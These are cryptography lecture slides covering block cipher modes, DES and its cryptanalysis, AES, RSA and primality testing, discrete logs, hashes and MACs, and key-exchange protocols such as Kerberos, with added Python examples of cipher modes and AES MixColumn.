Ci = Ek(Mi). It's malleable i.e., an active intruder can swap Ci and Cj or compose whole messages from parts of separate ones, as in for e.g., [P96, Section 4.4]:

    Depositor   Account #   Amount
    24B         8B          8B

And it's prone to dictionary attacks i.e., if Ci = Cj ⇒ Mi = Mj. In DES, there are 2^64 CTs, so by the birthday paradox there's a probability > .5 that 2^32 blocks of random CTs will result in a collision. This is = 8 × 2^32 = 32GB of text.

Block Ciphers & DES p.125

Block Cipher Modes CBC


Ci = Ek(Mi ⊕ Ci−1). IV is secret because initial parts of the message may be known, such as e-mail headers etc., which would provide a (M, C) pair. A transmission error affects at most two plain text blocks, the block containing the error and the following one. Decryption: Mi = Dk(Ci) ⊕ Ci−1.

Block Ciphers & DES p.126

Block Cipher Modes OFB


Ci = Pi ⊕ Ek^i(IV), i.e., the keystream block i is the IV encrypted i times. Turns DES into a stream cipher-like mode. Both IV and K are secret. Nobody uses it because there are much faster stream ciphers. Transmission bit errors do not propagate.
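The ECB, CBC and OFB equations of these three slides run on a toy block cipher, as an added Python example (not code from the slides or the textbook). The 16-bit keyed random permutation stands in for Ek/Dk only so that the example is self-contained; it is constructed for the demonstration and is not a real cipher. The message is assumed to already be a whole number of blocks:

```python
# Added example: ECB leaks equal blocks, CBC hides them but propagates a transmission
# error into two blocks, OFB is a keystream mode with no error propagation.
import random

BLOCK = 2    # toy 16-bit block; DES uses 64 bits, AES 128


class ToyBlockCipher:
    """A keyed permutation on 16-bit values (a shuffled table) playing the role of E_k / D_k.
    Constructed for illustration: NOT a secure cipher."""

    def __init__(self, key: bytes):
        table = list(range(1 << (8 * BLOCK)))
        random.Random(key).shuffle(table)            # deterministic given the key
        self.enc = table
        self.dec = [0] * len(table)
        for x, y in enumerate(table):
            self.dec[y] = x

    def encrypt_block(self, m: bytes) -> bytes:
        return self.enc[int.from_bytes(m, "big")].to_bytes(BLOCK, "big")

    def decrypt_block(self, c: bytes) -> bytes:
        return self.dec[int.from_bytes(c, "big")].to_bytes(BLOCK, "big")


def blocks(data):
    if len(data) % BLOCK:
        raise ValueError("message must be a whole number of blocks (pad first)")
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def ecb_encrypt(cipher, msg):
    """C_i = E_k(M_i): equal plaintext blocks give equal ciphertext blocks."""
    return b"".join(cipher.encrypt_block(m) for m in blocks(msg))


def cbc_encrypt(cipher, iv, msg):
    """C_i = E_k(M_i xor C_{i-1}) with C_0 = IV."""
    out, prev = [], iv
    for m in blocks(msg):
        prev = cipher.encrypt_block(xor(m, prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(cipher, iv, ct):
    """M_i = D_k(C_i) xor C_{i-1}."""
    out, prev = [], iv
    for c in blocks(ct):
        out.append(xor(cipher.decrypt_block(c), prev))
        prev = c
    return b"".join(out)


def ofb_encrypt(cipher, iv, msg):
    """C_i = P_i xor E_k^i(IV): the keystream never depends on the data, so decryption
    is the same function and a ciphertext bit error flips only that plaintext bit."""
    out, state = [], iv
    for m in blocks(msg):
        state = cipher.encrypt_block(state)
        out.append(xor(m, state))
    return b"".join(out)


def cbc_error_propagation(cipher, iv, msg, bad_index):
    """Flip one bit of ciphertext block bad_index; return the indices of plaintext blocks
    that decrypt wrongly (expected: bad_index and bad_index + 1 only)."""
    ct = bytearray(cbc_encrypt(cipher, iv, msg))
    ct[bad_index * BLOCK] ^= 0x01
    recovered = blocks(cbc_decrypt(cipher, iv, bytes(ct)))
    return [i for i, (m, r) in enumerate(zip(blocks(msg), recovered)) if m != r]


if __name__ == "__main__":
    cipher = ToyBlockCipher(b"constructed demo key")
    msg, iv = b"ABABABAB", b"\x12\x34"              # four identical blocks "AB"
    print(len(set(blocks(ecb_encrypt(cipher, msg)))), "distinct ECB blocks")
    print(len(set(blocks(cbc_encrypt(cipher, iv, msg)))), "distinct CBC blocks")
    print("corrupted CBC blocks:", cbc_error_propagation(cipher, iv, msg, 1))
```

The ECB run prints 1 distinct block for four identical plaintext blocks, which is the dictionary-attack leak of the ECB slide; the CBC corruption test returns [1, 2], the "at most two blocks" property of the CBC slide.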

Block Ciphers & DES p.127

Block Cipher Modes CFB


Ci = Pi ⊕ Ek(Ci−1). Also a stream mode of operation. Transmission error affects at most two plain text blocks. Decryption: Pi = Ci ⊕ Dk(Ci−1).

So it seems that a transmission error affects at most two plaintext blocks in this case as well, because in order to decrypt Ci one only needs Ci and Ci−1.

Block Ciphers & DES p.128

DES: Properties. . .
∃ keys k in DES such that DESk(DESk(m)) = m.

Or, keys k such that DESk⁻¹(m) = DESk(m). These are called weak keys. These are keys that generate a key schedule in which

k1 = k2 = ··· = k16.

Block Ciphers & DES p.129

DES: Properties. . .
∃ keys k, k' in DES such that ∀m, c = DESk(m) ⇒ m = DESk'(c).

Or that DESk'(DESk(m)) = m [x5c, Q. 67]. These are called semi-weak keys. The key schedule for k' is the reverse of that of k.
Show my m4 diagram of propagating L0 , R0 to L16 , R16 .

Block Ciphers & DES p.130

DES: Properties. . .
Weak keys in DES are [P96, Table 3-10]:

    Left half   Right half   Weak Key Value
    zeros       zeros        0101010101010101
    ones        ones         FEFEFEFEFEFEFEFE
    zeros       ones         1F1F1F1F0E0E0E0E
    ones        zeros        E0E0E0E0F1F1F1F1

Examples of semi-weak keys in DES are [P96, Table 3-11]:
(01FE01FE01FE01FE, FE01FE01FE01FE01)

Block Ciphers & DES p.131

Avalanche Effect
∆PT or ∆Key ⇒ ∆CT: a change in the plaintext or in the key produces a change in the ciphertext.

Extra Credit: Study and present another block cipher and summarize it in a single page.

Block Ciphers & DES p.132

Block Cipher Design Principles

# of rounds: the more the better. Design of the F function (provides confusion). Key scheduling.

Block Cipher Design Principles p.133

Block Cipher Design Principles. . . 


Design of the F function in the context of Feistel ciphers. As non-linear as possible. Strict avalanche criterion: ∀i, j any output bit j of an S-box should change with probability 1/2 when single input bit i is inverted. Or, a boolean expression involving any output bit involves all input bits. Bit independence criterion: ∀i, j, k output bits j, k should change independently when any single input bit i is inverted.

Approximately speaking, 00, 01, 10, 11 (1 = bit flip, 0 = no bit-flip) should be equiprobable. For all inputs, create 2^(m−1) pairs, one in which input bit i = 0 and the other in which the input bit i = 1 ... See [WT85] for more details.
Block Cipher Design Principles p.134

Attacks on Block Ciphers Exhaustive Search

Try all possible keys. 2^56 keys ≈ 10^19 keys.

    Cost                      Time
    1 DES encryption/µs       > 1000 years
    Wiener $100K machine      35 hours
    Wiener $1M machine        3.5 hours = 210 mins
    Wiener $10M machine       21 mins

Block Cipher Design Principles p.135

Attacks on Block Ciphers Differential Cryptanalysis

Biham & Shamir 1989. O(2^47) time and O(2^47) (M, C) pairs on DES. If the S-boxes were random, a differential cryptanalytic attack would require O(2^20) time and O(2^20) (M, C) pairs.

Block Cipher Design Principles p.136

Attacks on Block Ciphers Linear Cryptanalysis

Breaks DES in O(2^43) time and O(2^43) randomly chosen (M, C) pairs [Mat93]. Essentially a known-plaintext attack.

Block Cipher Design Principles p.137

Linear Cryptanalysis. . .

Find effective linear expressions for DES of the form

    P[i1, i2, ..., ia] ⊕ C[j1, j2, ..., jb] = K[k1, k2, ..., kc]

that hold with probability p. |p − 1/2| represents the effectiveness of the equation. The ⊕ of the key bits in the eqn. is best guessed equal to the LHS if p > 1/2 and to its complement otherwise. Can then determine one key bit K[k1, k2, ..., kc] as follows: Evaluate P[i1, i2, ..., ia] ⊕ C[j1, j2, ..., jb] with N random samples. Let T of them evaluate to 0. If p > 1/2, guess K[k1, k2, ..., kc] = 0 if T > N/2 and 1 otherwise. If p < 1/2, guess K[k1, k2, ..., kc] = 1 if T > N/2 and 0 otherwise.

Block Cipher Design Principles p.138

Linear Cryptanalysis Linear Approximation of S-boxes

Given that for S5 (S box #5), the 4th input bit is related to the four output bits with probability 12/64, we can propagate this equation through a three round DES as follows (rounds 1 and 3) [Mat93]:

[Figure: three DES rounds with round functions F1, F2, F3 and keys K1, K2, K3. The approximation uses input bit [15] of X1 = PL and of X3 = CL, key bit [22] of K1 and K3, and output bits [7,18,24,29] of F1 and F3, which are XORed into PH (round 1) and CH (round 3); X2 is the input to the middle round.]

Block Cipher Design Principles p.139

Linear Cryptanalysis Linear Approximation of S-boxes. . . 

Round 1: X2[7, 18, 24, 29] ⊕ PH[7, 18, 24, 29] ⊕ PL[15] = K1[22]
Round 3: X2[7, 18, 24, 29] ⊕ CH[7, 18, 24, 29] ⊕ CL[15] = K3[22]
Canceling X2[7, 18, 24, 29] we get (a)

    PH[7, 18, 24, 29] ⊕ CH[7, 18, 24, 29] ⊕ PL[15] ⊕ CL[15] = K1[22] ⊕ K3[22]

Extra Credit: Break 5-round DES as described in [Mat93].
(a) Look at it this way: X1[15] ⊕ K1[22] = PH[7, 18, 24, 29] ⊕ X2[7, 18, 24, 29] and

X3[15] ⊕ K3[22] = X2[7, 18, 24, 29] ⊕ CH[7, 18, 24, 29]

Block Cipher Design Principles p.140

DES VariantsDouble-DES
If Ek(M) is a symmetric cipher, then define DEk1,k2(M) = Ek1(Ek2(M)). Pictorially, it is M → Ek2 → Ek1 → C.

Block Cipher Design Principles p.141

DES VariantsDouble-DES. . .
Susceptible to meet-in-the-middle attack. Given an (M, C) pair: Step 1: Build the following table (sorted on Ek(M)) for all keys k

    k1        k2        ...   ki
    Ek1(M)    Ek2(M)    ...   Eki(M)

Step 2: ∀y, check if Ey⁻¹(C) is in the table for some key x. Then (x, y) encrypts M → C. For a k bit key, time ≈ 2^k + 2^k log 2^k ≈ k 2^k. That is, given enough space, DE is only as secure as E.

Block Cipher Design Principles p.142

DES VariantsTriple-DES
If Ek(M) is a symmetric cipher, then define 2KTEk1,k2 = Ek1 ∘ Dk2 ∘ Ek1. Key length = 112 bits for DES. Dk2 only for backward compatibility, could use E instead.

Block Cipher Design Principles p.143

DES VariantsTriple-DES. . .
Effective key length is k bits in a CCA/CPA.

[Figure: P → (K1) → A → X → (K2) → B → Y → (K1) → C → Z, the three stages of two-key triple DES with intermediate values labelled; the attack starts from the constant block 0.]

For all keys k2 compute Dk2(0) in a table T. Now, for each key k, find p = Dk(0). Do a CPA on p to find the corresponding z. From this (z, k) find y. See if y occurs in T. This is a possible pair of keys for T-DES. Except for an uncommon attack noted by Merkle, triple DES does yield the expected strength of 2^112 [P96, Section 4.5].

Block Cipher Design Principles p.144

DES VariantsTriple-DES. . .
Better to use three independent keys. Effective key length = 112 bits in a KPA (meet-in-the-middle). TEk1,k2,k3 = Ek1 ∘ Dk2 ∘ Ek3.

Block Cipher Design Principles p.145

DES Variants: DESX


DESX: Actually a generic construction. Invented by Ron Rivest around 1984. Intended to protect DES against exhaustive key search. Key-size for DESX = 2 × 64 + 56 = 184 bits. Effective key length = 64 + 56 − 1 = 119 bits [KR96]. DESX has hardly any computational overhead over ordinary DES. Ek1,k2,k3(M) = k1 ⊕ DESk2(M ⊕ k3).

Block Cipher Design Principles p.146

DES Variants: DESX. . .


DESX is secure against generic (black box) attacks such as exhaustive search [KR96]. DESk(M ⊕ k') and DESk(M) ⊕ k' are no good.
To break the former assume that you have two pairs (m1, c1), (m2, c2). Now, for each k, (m1, c1) reveals a k' that can be verified with (m2, c2). So you just need to cycle through the space for k. The latter is simpler: given (m1, c1), (m2, c2), c1 ⊕ c2 = Ek(m1) ⊕ Ek(m2). So you again cycle through the space of k to satisfy one or more such relations.

DESX assumes DES to be an ideal cipher, i.e., π1, π2, ..., π_(2^|k|) are independent random permutations. Extra Credit: Read [KR96] and summarize in one page.

Block Cipher Design Principles p.147

Stream Ciphers
Let's approximate the OTP with a pseudo-random OTP key. The pseudo-random generator seed is the key.

Block Cipher Design Principles p.148

Stream Ciphers LFSR


[Figure: an n-stage shift register with cells r_n ... r_1; the feedback bit is the XOR of the tapped cells.]

Goal: Choose taps and initial content so that the period is as long as possible. Hope for 2^n − 1 (exclude all 0s).

Block Cipher Design Principles p.149

Stream Ciphers LFSR. . .


Pro: Very fast in hardware. Con: The linearity of the LFSR is its weakness. It can be broken with only 2n bits of known (plaintext, ciphertext).
From this you can get 2n bits of key, say k2n, ..., k2, k1. Form and solve the following equations for the tap values ti:

    k_{n+1} = t_n k_n      + t_{n−1} k_{n−1}  + ··· + t_1 k_1
    k_{n+2} = t_n k_{n+1}  + t_{n−1} k_n      + ··· + t_1 k_2
      ...
    k_{2n}  = t_n k_{2n−1} + t_{n−1} k_{2n−2} + ··· + t_1 k_n

Block Cipher Design Principles p.150

Stream CipherRC4
Stream ciphers don't encrypt PT blocks directly. Invented in 1987 by Rivest. Reverse engineered and posted on the Cypherpunks mailing list in 1994. Seed: A permutation S of the sequence (0 ... 255) and two numbers 0 ≤ i, j < 256. Derived from the input key.

Block Cipher Design Principles p.151

Stream CipherRC4. . .
    def rc4_prga(S, i=0, j=0):
        # S: a permutation of 0..255 derived from the key (that key schedule is not shown here)
        while True:                        # do forever
            i = (i + 1) % 256
            j = (j + S[i]) % 256
            S[i], S[j] = S[j], S[i]        # swap(S[i], S[j]): update register state
            t = (S[i] + S[j]) % 256
            yield S[t]                     # output S[t]
Is it secure? Can't prove it. 1997: Run generator for 10^12 iterations. LSb of these 10^12 bytes has slightly more 1s than 0s.

Block Cipher Design Principles p.152

Features of Rijndael
Pronounced as Rhine-doll. Joan Daemen (of Proton World International) and Vincent Rijmen (of Katholieke Universiteit Leuven). Allows only 128, 192, and 256-bit key sizes (unlike the other candidates). Variable block length of 128, 192, or 256 bits. All nine combinations of key/block length possible. A block is the smallest data size the algorithm will encrypt. Vast speed improvement over DES in both hardware and software implementations.

AES p.153

AES Transformations
The round transformation of Rijndael does not have a Feistel structure.
ByteSub is a non-linear byte substitution; the S-box is invertible. You take the multiplicative inverse of the byte in GF(2^8) and then apply an affine transformation in GF(2). ShiftRow is simple. In MixColumn, the columns of the state are considered as polynomials over GF(2^8) and multiplied with {03}x^3 + {01}x^2 + {01}x + {02} modulo x^4 + 1. The inverse of MixColumn is similar to MixColumn. RoundKey addition is a straightforward bitwise XOR with the key.
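MixColumn as the slide states it, multiplication of a column by c(x) = {03}x^3 + {01}x^2 + {01}x + {02} modulo x^4 + 1 over GF(2^8), together with its inverse d(x) = c(x)^−1, as an added Python example (not code from the slides or the AES specification). It assumes the FIPS-197 convention that the top byte s0 of a column is the constant term of the column polynomial, and uses the standard "xtime" multiplication by x modulo x^8 + x^4 + x^3 + x + 1:

```python
# Added example: AES MixColumn and InvMixColumn as polynomial products modulo x^4 + 1.


def xtime(a):
    """Multiply a byte by x (= {02}) in GF(2^8) modulo x^8 + x^4 + x^3 + x + 1."""
    a <<= 1
    return (a ^ 0x11B) & 0xFF if a & 0x100 else a


def gmul(a, b):
    """Product of two bytes in GF(2^8), shift-and-add on xtime."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a, b = xtime(a), b >> 1
    return r


def poly_mul_mod_x4_1(a, b):
    """Multiply a(x) = a[0] + a[1] x + a[2] x^2 + a[3] x^3 by b(x), coefficients in
    GF(2^8), and reduce modulo x^4 + 1: since x^4 == 1, exponents simply wrap mod 4."""
    out = [0, 0, 0, 0]
    for i in range(4):
        for j in range(4):
            out[(i + j) % 4] ^= gmul(a[i], b[j])
    return out


C = [0x02, 0x01, 0x01, 0x03]   # c(x) = {03}x^3 + {01}x^2 + {01}x + {02}
D = [0x0E, 0x09, 0x0D, 0x0B]   # d(x) = {0b}x^3 + {0d}x^2 + {09}x + {0e} = c(x)^-1 mod x^4 + 1


def mix_column(col):
    """MixColumn on one state column [s0, s1, s2, s3]: s'(x) = c(x) * s(x) mod x^4 + 1."""
    return poly_mul_mod_x4_1(col, C)


def inv_mix_column(col):
    """InvMixColumn has the same shape: multiply by d(x) instead of c(x)."""
    return poly_mul_mod_x4_1(col, D)


if __name__ == "__main__":
    col = [0xDB, 0x13, 0x53, 0x45]               # constructed column
    mixed = mix_column(col)
    print([hex(v) for v in mixed], inv_mix_column(mixed) == col)
    print(poly_mul_mod_x4_1(C, D))               # [1, 0, 0, 0]: c(x) d(x) == 1
```

Because x^4 + 1 is not irreducible, the product is a ring operation rather than a field one; c(x) is invertible anyway, which is what the [1, 0, 0, 0] check confirms and what the "inverse is similar to MixColumn" remark on the slide relies on.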

AES p.154

Inverting AES
[Block-matrix diagram: the encryption rounds written out as the sequence BS, SR, MC, ARK (identity I on the diagonal) and the decryption as the reversed sequence ARK⁻¹, MC⁻¹, SR⁻¹, BS⁻¹.]

AES p.155

Inverting AES. . .
Each of BS, SR, MC, and ARK is invertible. BS and SR commute. (MC ∘ ARK) = [({03}x^3 + {01}x^2 + {01}x + {02}) ⊗ (s0i x^3 + s1i x^2 + s2i x + s3i)] ⊕ (k0i x^3 + k1i x^2 + k2i x + k3i). If E(4×4) = M(4×4) S(4×4) + K(4×4), then to invert E, we have

    M⁻¹ E + M⁻¹ K = S

which is the same form as M S + K but with M' = M⁻¹ and K' = M⁻¹ K.

AES p.156

RSA & Discrete Logs


Chapters 6,7 of textbook

AES p.157

RSA
By definition φ(n) is the number of integers 0 < x < n that are relatively prime to n. Consider n = p q where p and q are distinct primes. Then φ(n) = (n − 1) − (p − 1) − (q − 1) = (p − 1)(q − 1).

RSA p.158

RSA. . .
Choose large primes p and q differing by a few digits. Say one of 75 digits, the other of 100 digits. Both (p − 1) and (q − 1) should contain a large prime factor. Compute n = p q. It's hard to factor n. Choose e to be, say 65537. Public key = (e, n). Compute d ≡ e⁻¹ mod φ(n). Private key = (d, n). Infeasible to get d given (e, n). For a given message m, its encryption is c = m^e mod n. And to decrypt a cipher text c, compute m = c^d mod n: m^(ed) ≡ m^(1 mod φ(n)) ≡ m.

RSA p.159

An example of RSA
Let p = 57748729314142811323 and q = 5295757044745316310341. Then, n = 305823240090462151745038276856407276791143, φ(n) = 305823240090462151739684771082347817669480. Choose e = 65537, then d = e⁻¹ mod φ(n) = 59944845540718629190350345138224820571313. Encode a message NUS as its binary encoding (for example) to get 0x4e5553 = 5133651.

RSA p.160

An example of RSA. . .
To encrypt, find

5133651^65537 mod 305823240090462151745038276856407276791143 = 217657393729141588774828799917624500652607. To decrypt, compute c^d to get the original message.

217657393729141588774828799917624500652607^59944845540718629190350345138224820571313 mod n = run time error in bc = 5133651

RSA p.161

Breaking RSA
Brute force. Try all possible values of d. Given an (m, c) pair, find a d such that c^d = m. From this you might be able to factorize n [TW02, Exponent Factorization, Section 6.4]. Timing attacks. Do we need factorization to solve the RSA problem, which is finding the e-th root modulo n [MvOV96, Section 3.3]?

RSA p.162

Breaking RSA. . .
Mathematical attacks. Factor n. Find φ(n). But knowing φ(n) is equivalent to factoring n. Because n = pq, φ(n) = n − (p + q) + 1 and we have p + q = n + 1 − φ(n), (p − q)^2 = (p + q)^2 − 4n. This gives equations for p + q and p − q.
Show [Sta99, Fig. 6.9] on MIPS years needed to factor large n.

RSA p.163

Timing analysis
To compute a^x, use modular exponentiation. Square and multiply (if the corresponding bit in the binary expansion of x is 1). Suppose you have correctly guessed the first (b − 1) least significant bits of the exponent. Now you want to guess the b-th bit. Assume that the intermediate values for some a's are such that the multiply at the b-th bit takes excessive time! Then b-th bit = 1 ⇒ correlation between the b-th bit multiplication time and remaining time needed. b-th bit = 0 ⇒ no such correlation.

RSA p.164

Primes and Factoring


Go to this slide.

RSA p.165

Miller-Rabin Primality Test


Theorem: If p is an odd prime, then x^2 ≡ 1 mod p has only two solutions, namely x = 1 and x = −1.

Proof: x^2 ≡ 1 mod p means that p | (x^2 − 1), or p | (x − 1)(x + 1). Because p is prime, it divides either (x − 1) or (x + 1). It cannot divide both because then it'd divide their difference which is (x + 1) − (x − 1) = 2. Example: 5^2 mod 6 = 1 because 5^2 − 1 = (5 − 1)(5 + 1) is divisible by 2 · 3.

RSA p.166

Miller-Rabin Primality Test. . .


By Fermat's theorem, x^(p−1) ≡ 1 mod p if p is prime. So to test a number n for primality, try Fermat's for x = 2, 3, 4. Now, let n − 1 = 2^e · y with y odd. Find x^y. We ultimately want to find x^(2^e y). So, repeatedly square x^y but make sure that you never have z^2 = 1 when z ≠ ±1.

Examples: Is 125 prime? Let's try the Miller-Rabin test with base 2. (125 − 1) = 124 = 2^2 · 31. Now 2^31 ≡ 23, 23^2 ≡ 29, 29^2 ≡ 91. So 125 simply fails the Fermat test and is not prime.

Is 561 prime? Let's try again with base 2. (561 − 1) = 560 = 2^4 · 35. Now 2^35 ≡ 263, 263^2 ≡ 166, 166^2 ≡ 67, but 67^2 ≡ 1! So 561 fails the Miller-Rabin primality test because we get 67^2 ≡ 1 (mod 561) ⇒ 561 is not a prime.
RSA p.167

Problems with RSA


Problems with textbook RSA: Existential forgery. Blinding attack. Timing attack. Standard signatures use PKCS #1 to avoid these problems. Prime generation for RSA: Use the Miller-Rabin probabilistic test for primality testing. Choose primes to be strong primes. The number of primes ≤ n ≈ n/log n. Thus on the average one needs to test only log n/2 numbers to find a prime.

RSA p.168

Discrete Logs
Let Zp = {0, 1, ..., p − 1}, p is prime, and Zp* = {1, 2, ..., p − 1}. For 0 < g < p let's study the sequence g^1, g^2, g^3, ... We know from Fermat's that g^(p−1) ≡ 1 (mod p).
Show [Sta99, Table 7.6].

Discrete Logs p.169

Discrete Logs. . .
The sequence g^1, g^2, g^3, ... ends in 1. If the sequence ends in 1, it clearly repeats itself after that.
If it does not, let g^m ≡ g^x (mod p) with g ≠ 1 and 0 < m < x. Then g^m (g^(x−m) − 1) ≡ 0, which means that either p | (g^(x−m) − 1) or p | g^m. But p ∤ g^m because p ∤ g. So g^(x−m) ≡ 1 mod p, which is a contradiction. Zp* is a cyclic group. Not every element of Zp* is a generator. For e.g., ⟨2⟩ mod 7 = {1, 2, 4}. Logarithms are the inverse of exponentiation.

Discrete Logs p.170

Discrete Logs. . .
    Reals                           Zp*
    log_x 1 = 0                     log_g 1 (mod p) = 0
    log_x x = 1                     log_g g (mod p) = 1
    log_x (yz) = log_x y + log_x z  log_g (yz) (mod p) = log_g y + log_g z (mod φ(p))
    log_x (y^r) = r log_x y         log_g (y^r) (mod p) = r log_g y (mod φ(p))

Discrete Logs p.171

Discrete Logs. . .
See the primitive roots table to explain generators. α^x = y mod p ⇔ dlog_α y = x. Discrete logs can be used to implement bit commitment and key exchange.

Discrete Logs p.172

El Gamal public key encryption


From [TW02, Sec. 7.4]. Given p prime, α a generator of Zp*, a the private key, β = α^a the public key, and k a pseudo random integer. To encrypt a message 0 < m < p, compute r = α^k (mod p). Encryption of m: c = (r, β^k m). To decrypt c, compute (β^k m)/r^a.

Given α^k, α^a, can you find α^(ak) without knowledge of a? Because if you can, then you can find r^a = α^(ak).

Discrete Logs p.173

Macs and Hashes

Discrete Logs p.174

Hash Functions
A hash function accepts a variable-size message m as input and produces a fixed-size hash code h(m), called its message digest. It is a function of all the bits of the message. Instead of signing and MACing messages, one can sign and MAC the hash of messages. Much faster for signatures. MACs no slower than hashes.

Hash Functions p.175

Hash Functions. . .
A hash function should be [Sta99, Sec 8.4] relatively easy to compute. Pre-image resistant: means a one-way hash i.e., given y = h(x), can't [computationally] find x. Second pre-image resistant: useful for virus protection. Given x, h(x), can't find x' | h(x) = h(x'). Collision resistant: can't find arbitrary x, y | h(x) = h(y) by just examining h. A simple hash function is the XOR of fixed sized message blocks. Useless for data security: trivial to compute pre-image and second pre-image. By the birthday paradox, if the hash size is 64 bits, then time for collision ≈ 2^32 (small). Typical hash size 160 bits.

Hash Functions p.176

Hash Functions. . .
Examples: MD5, SHA-1. Almost all real-life hash functions are iterative: the Merkle-Damgård construction. CV0 is fixed and known for the hash function.

[Figure: Merkle-Damgård iteration: b-bit message blocks Y0, Y1, Y2, ... are fed, one per step, into the compression function together with the chaining variable, CV0 → CV1 → CV2 → ...]

Hash Functions p.177

Generalized Birthday Attack


Probability P(n, k) that there's a duplicate in k random selections between 1 ... n [Sta99, Appendix 8A].

    P(n, k) = 1 − Pr[no duplicates in k selections]
            = 1 − n(n−1)···(n−k+1) / n^k
            = 1 − (1 − 1/n)(1 − 2/n)···(1 − (k−1)/n)
            ≈ 1 − e^(−1/n) e^(−2/n) ··· e^(−(k−1)/n)        [using 1 − x ≈ e^(−x); indeed 1 − x ≤ e^(−x)]
            = 1 − e^(−k(k−1)/2n)

For k ≈ √(2 ln 2 · n), P(n, k) ≈ .5. As k increases, the product decreases because each product term is < 1, hence P(n, k) = 1 − product increases, which means that the probability of collision increases.

Hash Functions p.178

MACs
A MAC hk (m) takes a secret k and a variable-size message m as input and produces a xed-size code such that An attacker capable of chosen message attack cannot do existential forgery i.e., construct hk (m) for an unknown m.

MACs p.179

CBC-MAC
See [Sta99, pg. 252]. Tail needed to prevent existential forgery. Classic construction used in the banking industry. Its secret key is the pair (k, k').

[Figure: CBC-MAC: the message blocks M are chained through Ek (each block XORed with the previous output before encryption) and the final value is passed through Ek', the tail.]

MACs p.180

MACs from CRHFs such as MD5 & SHA
How about MACk(M) = h(k || M)? Bad idea because of the Merkle-Damgård construction. Consider the message M = k m. This is hashed as k m | pad. From this, construct the message M' = k m pad. This is hashed as k m | pad | pad2. Without knowledge of k, one can say that h(M') = f(h(M), padding). How about MACk(M) = h(M || k)? Bad idea. You can do a birthday attack to get m, m' such that Hi(m) = Hi(m'). So, the collision is independent of k. How about MACk(M) = h(k || M || k)? Envelope method. No serious attacks but no analysis either.

MACs p.181

MACs from CRHFs such as MD5 & SHA. . .
HMAC [Sta99, pg. 294], [BCK96a] and [BCK96b]. Used in SSL, IPSec. 0 is used to pad k to full compression function block size for h, usually 512 bits.

    HMACk(m) = h((0‖k ⊕ opad) || h((0‖k ⊕ ipad) || m))

[0‖k ⊕ ipad] and [0‖k ⊕ opad] are of compression function block size (512 bits); the inner hash output is of chaining variable size (128/160 bits). Block size for MD5 = SHA-1 = 512 bits. Chaining variable size for MD5 = 128 bits, for SHA-1 = 160 bits. On a 200MHz Pentium, HMAC-MD5 clocked 28.5MB/s while HMAC-SHA-1 clocked 15.25MB/s. CBC-MAC on the other hand, clocked 4.7MB/s and IDEA-MAC clocked 3MB/s.

MACs p.182

Protocols
Adapted from [P96, Chapter 4]. A protocol is an orderly sequence of steps two or more parties take to accomplish some task. A good protocol should be Established in advance. Mutually subscribed to. Unambiguous. Complete.
For example, the hello protocol on phone connections.

We are interested in protocols by which mutually suspicious parties can interact with each other and be convinced of fairness.

Security Protocols p.183

Types of Protocols
Arbitrated: trusted third party involved in the interaction. Finding a mutually trustworthy third party? Availability of the third party (may become a bottleneck). Shares secrets with involved parties. Adjudicated: disinterested third party can judge fairness based on evidence. Detect failure after the fact. Self-Enforcing: guarantees fairness. If either party cheats, it becomes evident to the other party.

Security Protocols p.184

Key Exchange Protocols: NS
Symmetric Key Exchange Using a Trusted Server. Authentication with key exchange as a side-effect. Say Pablo wants to communicate with Renee. S is the trusted server [NS78]. Pablo and Renee each share a key with the server, say K_P and K_R.
P → S: (P, R, I_P). P requests appropriate credentials to authenticate himself to R.
S → P: E_{K_P}(I_P, R, K_PR, E_{K_R}(K_PR, P)). S returns the session key K_PR encrypted for P and a ticket E_{K_R}(K_PR, P) encrypted for R.
P → R: E_{K_R}(K_PR, P).

Security Protocols p.185

Key Exchange Protocols. . .NS


Compromise of the session key results in spoofing [DS81]. The protocol fails to provide key freshness from the viewpoint of R [Seb], [Sma03, Section 6.2.3]. Knowledge of K_PR allows message three to be replayed, thus permitting anyone to become P. Subject to attacks if passwords such as K_P are weak.

Security Protocols p.186

Key Exchange Protocols. . . Kerberos
From [Sma03, Section 6.2.5]. (Figure: Alice, Bob and the TTP exchanging messages 1–4 below.)
1. A → TTP: A, B. No nonce; everyone is loosely time synchronized.
2. TTP → A: {T_S, L, K_ab, B, {T_S, L, K_ab, A}_{K_bs}}_{K_as}
3. A → B: {T_S, L, K_ab, A}_{K_bs}, {A, T_A}_{K_ab}
4. B → A: {T_A + 1}_{K_ab}

Security Protocols p.187

Kerberos V4
Adapted from [KPS95, Chapter 10] and [Sta99, Chapter 11]. Based on work by Needham and Schroeder [NS78]. KDC + library of subroutines used by distributed applications. Some modified applications: telnet, BSD r-tools, NFS. The KDC shares a master key with each principal (each user and resource that will be using Kerberos). Bob knows that anyone who knows K_AB is acting on Alice's behalf.

Security Protocols p.188

Kerberos V4. . .
Alice registers with Kerberos and gets a ticket from the TGS.
Alice → WS: pwd (→ DES key).
WS → AS: AS_REQ to get a TGT.
AS → WS: AS_REP = K_A{S_A, TGT}.

Security Protocols p.189

Kerberos V4. . .
Alice wants to talk to Bob.
Alice's WS → TGS: TGS_REQ = TGT + Authenticator.
Authenticator = S_A{TS} (within 5 mins of the current time).
TGT = K_KDC{Alice, S_A}.

Security Protocols p.190

Kerberos V4. . .
Alice establishes communication with Bob.
Alice's WS → Bob: AP_REQ = Bob's ticket + Authenticator.
Authenticator = K_AB{TS}.
Bob's ticket = K_B{Alice, K_AB}.

Security Protocols p.191

Kerberos Realms
Hard for everyone to trust a single KDC. Divide the network into realms, each with its own KDC database. Principal = (NAME, INSTANCE, REALM), e.g., (fileserv, jailbreak, R1). For humans, INSTANCE could be a role. Inter-realm authentication: the KDC in realm B is registered as a principal in realm A.

Security Protocols p.192

Key Exchange Protocols


It's not a good idea to exchange too much information encrypted with a single key. Symmetric Key Exchange Without Server: send E_{K_old}(K_new) to the other party!

Security Protocols p.193

Key Exchange Protocols. . .


Asymmetric Key Exchange Without Server (P knows R's public key). Reduces the need for individual keys. Reduces the vulnerability of a central repository. P could send E_R(K_PR) directly to R: no authentication, no replay prevention. P could send E_R(D_P(K_PR)) to R: one message passes an authenticated, confidential key, but still no replay prevention. Have P decrypt a nonce with K_PR to avoid that.

Security Protocols p.194

Key Exchange Protocols. . .


